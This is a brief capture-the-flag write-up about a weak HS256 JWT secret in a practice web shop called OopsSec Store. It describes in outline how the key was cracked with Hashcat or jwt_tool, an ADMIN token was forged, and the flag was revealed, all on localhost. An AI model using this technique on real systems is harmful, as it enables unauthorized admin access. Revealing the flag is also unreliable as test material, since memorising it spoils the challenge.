Critical JWT Vulnerability in OopsSec Store Enables Privilege Escalation via Weak Secret Key

2 Feb 2026

jwtvulnerabilityprivilege_escalationweak_secrethmac-sha256brute_forcedictionary_attackadmin_bypasslocalstorageclient_side_validationctfweb_security

A vulnerability in the JSON Web Token (JWT) implementation of the OopsSec Store application allowed privilege escalation through a weak signature key. The token, signed using the HMAC-SHA256 (HS256) algorithm, relied on a predictable secret (secret), which was exposed via brute-force or dictionary attacks using tools like Hashcat or jwt_tool. After recovering the key, an attacker could forge a modified token with the ADMIN role, bypassing access controls to the /admin dashboard. The application stored the token in the browser's localStorage and performed permission validation on the client side. The flaw was exploited in a local environment (http://localhost:3000) using preconfigured test accounts. The obtained flag was OSS{w34k_jwt_s3cr3t_k3y}.